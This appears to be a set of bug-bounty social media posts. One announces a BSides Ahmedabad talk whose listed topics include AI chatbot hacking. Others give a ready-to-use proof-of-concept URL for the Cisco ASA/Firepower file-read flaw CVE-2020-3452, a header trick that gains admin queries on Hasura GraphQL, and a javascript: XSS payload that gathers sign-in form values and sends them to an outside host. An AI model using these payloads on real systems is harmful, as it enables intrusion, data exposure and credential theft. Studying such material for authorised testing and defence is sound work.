Iam in India with @StandoffBB team
Behold for the talk in 13/SEP in @bsidesahmedabad
With a so interesting topics
I will talk about
1 sourcegraph dorking
2IDORS /BAC via authorize burp Ext
3 with &without AI
4 AI chatbot hacking
5 Prompt from AI to other AI (Build your method in UI)
6 VirusTotal V2 scrip
7 #bugbountytip #bugbountytips a lot of tips
#bugbounty
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read "/+CSCOE+/portal_inc.lua" file.
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
Happy Hacking!
Interesting Hasura GraphQL Framework Access Control Issue.
Found an authenticated endpoint "/script"
Added two headers to the existing request:
X-Hasura-Role: admin
X-Hasura-User-Id: 0
Was able to query as admin 😀
When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them 😉
PoC: javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i<inpts.length;i++){info+=','+inputs[i].value};location.href='https://xhze.em/?'+info
#bugbountytip